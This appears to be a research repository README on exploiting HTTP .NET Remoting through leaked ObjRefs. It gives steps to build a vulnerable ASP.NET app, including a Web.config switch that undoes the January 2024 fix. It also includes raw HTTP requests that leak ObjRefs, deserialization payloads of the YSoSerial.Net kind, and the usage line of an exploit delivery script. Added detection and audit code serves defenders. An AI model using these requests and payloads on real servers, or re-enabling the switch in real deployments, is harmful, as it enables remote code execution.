This repository provides further details and resources on the CODE WHITE blog post of the same name, "Leaking ObjRefs to Exploit HTTP .NET Remoting":
- Creating a vulnerable ASP.NET web application
- Detecting `ObjRef` leaks
- Example deserialization payloads that work under the `TypeFilterLevel.Low` restrictions
- Exploit script for delivering the payloads
The following is based on "Configure Application Insights for your ASP.NET website" by Microsoft and describes how to create a vulnerable ASP.NET web application with Visual Studio 2019 (required to target .NET Framework 4.5.2; it can still be downloaded at https://aka.ms/vs/16/release/vs_community.exe) and Microsoft Application Insights:
- Open Visual Studio 2019.
- Select File > New > Project.
- Select ASP.NET Web Application (.NET Framework) C#, then Next.
- Select .NET Framework 4.5.2, then Create.
- Select Empty, then Create.
- Select Project > Add Application Insights Telemetry.
- Select Application Insights SDK (local), then Next.
- Check NuGet packages, then click Finish.
If the .NET Framework updates of January 2024 are installed, open the `Web.config` file and add the following under `/configuration/appSettings` to re-enable the vulnerable behavior:

```xml
<add key="microsoft:Remoting:LateHttpHeaderParsing" value="true" />
```
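The quirk switch above is also what a defender should look for when auditing deployed applications: if it is set to `true`, the January 2024 fix is switched off again. The following is an added example (not code from the CODE WHITE repository) that parses a `Web.config` and reports whether the switch is explicitly enabled. The two config fragments are constructed for the example; the `appSettings` key is the one named above, and the case-insensitive boolean comparison is an assumption about how the value is read.

```python
"""Audit a Web.config for the LateHttpHeaderParsing quirk switch.

Added example (not code from the CODE WHITE repository). The Web.config
fragments below are constructed; the appSettings key is the one from the
write-up.
"""
import xml.etree.ElementTree as ET
from typing import Optional

# appSettings key that re-enables the pre-January-2024 header parsing.
LATE_PARSING_KEY = "microsoft:Remoting:LateHttpHeaderParsing"


def late_header_parsing_setting(web_config_xml: str) -> Optional[str]:
    """Return the effective value of the switch under /configuration/appSettings,
    or None when no value is in effect (the patched default then applies).

    Entries are walked in document order so that a later <add> for the same
    key overrides an earlier one and <remove>/<clear> drop it again, which
    approximates how .NET merges appSettings entries.
    """
    root = ET.fromstring(web_config_xml)
    value: Optional[str] = None
    for elem in root.iterfind("./appSettings/*"):
        if elem.tag == "clear":
            value = None
        elif elem.get("key") == LATE_PARSING_KEY:
            value = elem.get("value") if elem.tag == "add" else None
    return value


def late_header_parsing_enabled(web_config_xml: str) -> bool:
    """True when the config explicitly re-enables the vulnerable behavior.

    Assumption: the value is interpreted as a boolean case-insensitively.
    """
    value = late_header_parsing_setting(web_config_xml)
    return value is not None and value.strip().lower() == "true"


# Constructed sample: the weak setting from the write-up.
VULNERABLE_WEB_CONFIG = """
<configuration>
  <appSettings>
    <add key="microsoft:Remoting:LateHttpHeaderParsing" value="true" />
  </appSettings>
</configuration>
"""

# Constructed sample: the key is absent, so the patched default applies.
HARDENED_WEB_CONFIG = """
<configuration>
  <appSettings>
    <add key="SomeOtherSetting" value="1" />
  </appSettings>
</configuration>
"""

# Constructed sample: the key was added and then removed further down.
REMOVED_WEB_CONFIG = """
<configuration>
  <appSettings>
    <add key="microsoft:Remoting:LateHttpHeaderParsing" value="true" />
    <remove key="microsoft:Remoting:LateHttpHeaderParsing" />
  </appSettings>
</configuration>
"""

if __name__ == "__main__":
    for name, cfg in (("vulnerable", VULNERABLE_WEB_CONFIG),
                      ("hardened", HARDENED_WEB_CONFIG),
                      ("removed", REMOVED_WEB_CONFIG)):
        print(name, "->", "ENABLED" if late_header_parsing_enabled(cfg) else "not enabled")
```

Note that an absent key only means the patched behavior is in effect when the January 2024 updates are actually installed; the audit should therefore be paired with a check of the installed .NET Framework version.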
You can then run the web application via Debug > Start Without Debugging or by pressing Ctrl+F5.
You can use the following requests to leak `ObjRef`s of `MarshalByRefObject` instances stored in the `LogicalCallContext`:
- `BinaryServerFormatterSink`:
  ```http
  GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
  __RequestVerb: POST
  Content-Type: application/octet-stream
  ```
- `SoapServerFormatterSink`:
  ```http
  GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
  __RequestVerb: POST
  Content-Type: text/xml
  ```

Leaked `ObjRef` URIs can then be matched using the following regex:

```
/[0-9a-f_]+/[0-9A-Za-z_+]+_\d+\.rem
```
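The two requests above and the regex give a defender everything needed to spot this activity in traffic: a `GET` to a `.rem` endpoint whose `__RequestVerb` header disagrees with the real method, and a response that carries an `ObjRef` URI. The following is an added example (not code from the CODE WHITE repository) that applies both checks to a request/response pair; the HTTP messages in it are constructed samples, not captured traffic, and the regex is the one quoted above.

```python
"""Detect HTTP .NET Remoting ObjRef-leak probes and leaked ObjRef URIs.

Added example (not code from the CODE WHITE repository or blog post). The
request/response samples are constructed; the verb-override header and the
ObjRef URI regex come from the write-up.
"""
import re
from typing import Dict, List, Tuple

# Regex for leaked ObjRef URIs, as given in the write-up.
OBJREF_URI_RE = re.compile(r"/[0-9a-f_]+/[0-9A-Za-z_+]+_\d+\.rem")

# Header that makes the remoting channel treat the request as a different verb.
VERB_OVERRIDE_HEADER = "__requestverb"


def parse_http_message(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP message into (start line, lowercase header map, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def is_objref_leak_probe(request: str) -> bool:
    """True if a request to a .rem endpoint carries a __RequestVerb that
    differs from the actual HTTP method (the GET/POST mismatch the leak relies on)."""
    start, headers, _ = parse_http_message(request)
    parts = start.split(" ")
    if len(parts) < 2:
        return False
    method, path = parts[0], parts[1]
    override = headers.get(VERB_OVERRIDE_HEADER)
    if override is None:
        return False
    endpoint = path.split("?", 1)[0].lower()
    return endpoint.endswith(".rem") and override.upper() != method.upper()


def leaked_objref_uris(response: str) -> List[str]:
    """Return the distinct ObjRef URIs found anywhere in a response."""
    return sorted(set(OBJREF_URI_RE.findall(response)))


def analyze_exchange(request: str, response: str) -> List[str]:
    """Produce human-readable findings for one request/response pair."""
    findings: List[str] = []
    if is_objref_leak_probe(request):
        findings.append("verb-override probe against a .rem endpoint")
    for uri in leaked_objref_uris(response):
        findings.append("ObjRef URI leaked in response: " + uri)
    return findings


# Constructed sample: the BinaryServerFormatterSink probe from the write-up.
SAMPLE_PROBE = (
    "GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0\r\n"
    "__RequestVerb: POST\r\n"
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
)

# Constructed sample: a response body in which an ObjRef URI appears.
SAMPLE_LEAKY_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    "...error stream mentioning /0123abcd_5_1/WnE6vXz+Q_2.rem..."
)

# Constructed samples that must not be flagged.
BENIGN_REQUEST = "GET /index.html HTTP/1.1\r\nHost: localhost\r\n\r\n"
CONSISTENT_POST = (
    "POST /RemoteApplicationMetadata.rem HTTP/1.0\r\n"
    "__RequestVerb: POST\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for finding in analyze_exchange(SAMPLE_PROBE, SAMPLE_LEAKY_RESPONSE):
        print(finding)
```

In practice the request side of the check needs header-level visibility (a reverse proxy, WAF or full-packet capture), since default IIS logs do not record the `__RequestVerb` header; the regex can additionally be run over response bodies to confirm that an `ObjRef` actually left the server.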
We have created two simple deserialization payloads based on the `TextFormattingRunProperties` gadget of YSoSerial.Net with custom XAML payloads that work under the restrictions caused by `TypeFilterLevel.Low` to perform the following:

```csharp
HttpContext.Current.Response.AddHeader("Set-Cookie", "x=ad92afb4-00c3-4479-bab8-2425b5716081");
HttpContext.Current.Response.RedirectLocation = "/ad92afb4-00c3-4479-bab8-2425b5716081";
```
The HTTP headers can be observed in the server's response to the HTTP .NET Remoting request.
The `RemoteApplicationMetadata.py` script provides a way to leak an existing `ObjRef` and then use it in a subsequent request to deliver a given payload:
```
usage: RemoteApplicationMetadata.py [-h] [-c] [--chunk-range CHUNK_RANGE] [-e] [-f {binary,soap}] [-u] [-v] url [file]

positional arguments:
  url                   target URL (without `RemoteApplicationMetadata.rem`)
  file                  BinaryFormatter/SoapFormatter payload file (default: stdin)

options:
  -h, --help            show this help message and exit
  -c, --chunked         use chunked Transfer-Encoding for request
  --chunk-range CHUNK_RANGE
                        range to pick the chunk size from randomly, e. g., 1-10
  -e, --encoding        apply a random non ASCII-based encoding on SOAP
  -f {binary,soap}, --format {binary,soap}
                        targeted runtime serializer format (default: soap)
  -u, --use-generic-uri
                        use the generic `RemoteApplicationMetadata.rem` also for the payload delivery request
  -v, --verbose         print verbose info
```

Example:

```sh
./RemoteApplicationMetadata.py -f binary https://127.0.0.1:44365 AddHeader.bin -u -v
```